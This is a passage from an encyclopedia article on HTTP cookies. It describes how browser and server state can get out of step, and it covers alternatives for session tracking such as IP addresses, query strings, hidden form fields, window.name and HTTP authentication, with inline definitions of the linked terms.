Likewise, cookies do not differentiate between multiple users who share the same user account, computer, and browser.

Inconsistent state on client and server

The use of cookies may generate an inconsistency between the state of the client and the state as stored in the cookie. If the user acquires a cookie and then clicks the "Back" button of the browser, the state on the browser is generally not the same as before that acquisition. As an example, if the shopping cart of an online shop is built using cookies, the content of the cart may not change when the user goes back in the browser's history: if the user presses a button to add an item in the shopping cart and then clicks on the "Back" button, the item remains in the shopping cart. This might not be the intention of the user, who possibly wanted to undo the addition of the item. This can lead to unreliability, confusion, and bugs. Web developers should therefore be aware of this issue and implement measures to handle such situations.

Alternatives to cookies

Some of the operations that can be done using cookies can also be done using other mechanisms.

IP address

Some users may be tracked based on the IP address
IP address
An Internet Protocol address is a numerical label assigned to each device participating in a computer network that uses the Internet Protocol for communication. An IP address serves two principal functions: host or network interface identification and location addressing...

 of the computer requesting the page. The server knows the IP address of the computer running the browser or the proxy
Proxy server
In computer networks, a proxy server is a server that acts as an intermediary for requests from clients seeking resources from other servers. A client connects to the proxy server, requesting some service, such as a file, connection, web page, or other resource available from a different server...

, if any is used, and could theoretically link a users session to this IP address. However, these addresses are not reliable in identifying a user because computers and proxies are very often shared by several users.

Some systems such as Tor
Tor (anonymity network)
Tor is a system intended to enable online anonymity. Tor client software routes Internet traffic through a worldwide volunteer network of servers in order to conceal a user's location or usage from someone conducting network surveillance or traffic analysis...

 are designed to retain Internet anonymity and make tracking by IP address impractical or impossible.

URL (query string)

A more precise technique is based on embedding information into URLs. The query string
Query string
In World Wide Web, a query string is the part of a Uniform Resource Locator that contains data to be passed to web applications such as CGI programs....

 part of the URL
Uniform Resource Locator
In computing, a uniform resource locator or universal resource locator is a specific character string that constitutes a reference to an Internet resource....

 is the one that is typically used for this purpose, but other parts can be used as well. The Java Servlet
Java Servlet
A servlet is a Java programming language class used to extend the capabilities of servers that host applications accessed via a request-response programming model. Although servlets can respond to any type of request, they are commonly used to extend the applications hosted by Web servers...

 and PHP
PHP
PHP is a general-purpose server-side scripting language originally designed for web development to produce dynamic web pages. For this purpose, PHP code is embedded into the HTML source document and interpreted by a web server with a PHP processor module, which generates the web page document...

 session mechanisms both use this method if cookies are not enabled.

This method consists of the Web server appending query strings to the links of a Web page it holds when sending it to a browser. When the user follows a link, the browser returns the attached query string to the server.

Query strings used in this way and cookies are very similar, both being arbitrary pieces of information chosen by the server and sent back by the browser. However, there are some differences: since a query string is part of a URL, if that URL is later reused, the same attached piece of information is sent to the server. For example, if the preferences of a user are encoded in the query string of a URL and the user sends this URL to another user by e-mail
E-mail
Electronic mail, commonly known as email or e-mail, is a method of exchanging digital messages from an author to one or more recipients. Modern email operates across the Internet or other computer networks. Some early email systems required that the author and the recipient both be online at the...

, those preferences will be used for that other user as well.

Moreover, even if the same user accesses the same page two times, there is no guarantee that the same query string is used in both views. For example, if the same user arrives to the same page but coming from a page internal to the site the first time and from an external search engine
Search engine
A search engine is an information retrieval system designed to help find information stored on a computer system. The search results are usually presented in a list and are commonly called hits. Search engines help to minimize the time required to find information and the amount of information...

 the second time, the relative query strings are typically different while the cookies would be the same. For more details, see query string
Query string
In World Wide Web, a query string is the part of a Uniform Resource Locator that contains data to be passed to web applications such as CGI programs....

.

Other drawbacks of query strings are related to security: storing data that identifies a session in a query string enables or simplifies session fixation
Session fixation
In computer network security, session fixation attacks attempt to exploit the vulnerability of a system which allows one person to fixate another person's session identifier...

 attacks, referrer logging attacks and other security exploits
Exploit (computer security)
An exploit is a piece of software, a chunk of data, or sequence of commands that takes advantage of a bug, glitch or vulnerability in order to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic...

. Transferring session identifiers as HTTP cookies is more secure.

Hidden form fields

Another form of session tracking is to use web forms
Form (web)
A webform on a web page allows a user to enter data that is sent to a server for processing. Webforms resemble paper or database forms because internet users fill out the forms using checkboxes, radio buttons, or text fields...

 with hidden fields. This technique is very similar to using URL query strings to hold the information and has many of the same advantages and drawbacks; and if the form is handled with the HTTP GET method, the fields actually become part of the URL the browser will send upon form submission. But most forms are handled with HTTP POST, which causes the form information, including the hidden fields, to be appended as extra input that is neither part of the URL, nor of a cookie.

This approach presents two advantages from the point of view of the tracker: first, having the tracking information placed in the HTML source and POST input rather than in the URL means it will not be noticed by the average user; second, the session information is not copied when the user copies the URL (to save the page on disk or send it via email, for example).

This method can be easily used with any framework that supports web forms.

window.name

All current web browsers can store a fairly large amount of data (2–32 MB) via JavaScript using the DOM
Document Object Model
The Document Object Model is a cross-platform and language-independent convention for representing and interacting with objects in HTML, XHTML and XML documents. Aspects of the DOM may be addressed and manipulated within the syntax of the programming language in use...

 property window.name. This data can be used instead of session cookies and is also cross-domain. The technique can be coupled with JSON
JSON
JSON , or JavaScript Object Notation, is a lightweight text-based open standard designed for human-readable data interchange. It is derived from the JavaScript scripting language for representing simple data structures and associative arrays, called objects...

/JavaScript objects to store complex sets of session variables on the client side.

The downside is that every separate window or tab will initially have an empty window.name; in times of tabbed browsing this means that individually opened tabs (initiation by user) will not have a window name. Furthermore window.name can be used for tracking visitors across different web sites, making it of concern for Internet privacy
Internet privacy
Internet privacy involves the right or mandate of personal privacy concerning the storing, repurposing, providing to third-parties, and displaying of information pertaining to oneself via the Internet. Privacy can entail both Personally Identifying Information or non-PII information such as a...

.

In some respects this can be more secure than cookies due to not involving the server, so it is not vulnerable to network cookie sniffing attacks. However if special measures are not taken to protect the data, it is vulnerable to other attacks because the data is available across different web sites opened in the same window or tab.

HTTP authentication

The HTTP protocol includes the basic access authentication and the digest access authentication
Digest access authentication
Digest access authentication is one of the agreed upon methods a web server can use to negotiate credentials with a user's web browser. It uses encryption to send the password over the network which is safer than the Basic access authentication that sends plaintext.Technically digest...

 protocols, which allow access to a Web page only when the user has provided the correct username and password. If the server requires such credentials for granting access to a web page, the browser requests them from the user and, once obtained, the browser stores and sends them in every subsequent page request. This information can be used to track the user.

See also

  • Dynamic HTML
    Dynamic HTML
    Dynamic HTML, or DHTML, is an umbrella term for a collection of technologies used together to create interactive and animated web sites by using a combination of a static markup language , a client-side scripting language , a presentation definition language , and the Document Object Model.DHTML...

  • Evercookie
    Evercookie
    Evercookie is a JavaScript-based application which produces zombie cookies in a web browser that are intentionally difficult to delete.-Background:A traditional HTTP cookie is a relatively small amount of textual data that is stored by the user's browser...

  • Local Shared Object
    Local Shared Object
    Local Shared Objects , commonly called flash cookies are pieces of data that websites which use Adobe Flash may store on a user's computer...

     – Flash Cookies
  • Session Beans
    Session Beans
    In the Java Platform, Enterprise Edition specifications, a Session Bean is a type of Enterprise Bean. The only other type is the Message-driven bean. Legacy EJB versions from before 2006 had a third type of bean, the Entity Bean...

  • Session (computer science)
    Session (computer science)
    In computer science, in particular networking, a session is a semi-permanent interactive information interchange, also known as a dialogue, a conversation or a meeting, between two or more communicating devices, or between a computer and user . A session is set up or established at a certain point...

  • Session ID
    Session ID
    In computer science, a session identifier, session ID or session token is a piece of data that is used in network communications to identify a session, a series of related message exchanges. Session identifiers become necessary in cases where the communications infrastructure uses a stateless...

  • Web server session management
  • Web Storage and DOM Storage
  • Web visitor tracking
    Web visitor tracking
    Web visitor tracking is the analysis of visitor behaviour on a website. Analysis of an individual visitor's behaviour may be used to provide that visitor with options or content that relates to their implied preferences; either during a visit or in the future...

  • Zombie cookie
    Zombie cookie
    A zombie cookie is any HTTP cookie that is recreated after deletion from backups stored outside the web browser's dedicated cookie storage. This makes them very difficult to remove...


External links

The source of this article is wikipedia, the free encyclopedia.  The text of this article is licensed under the GFDL.
 
x
OK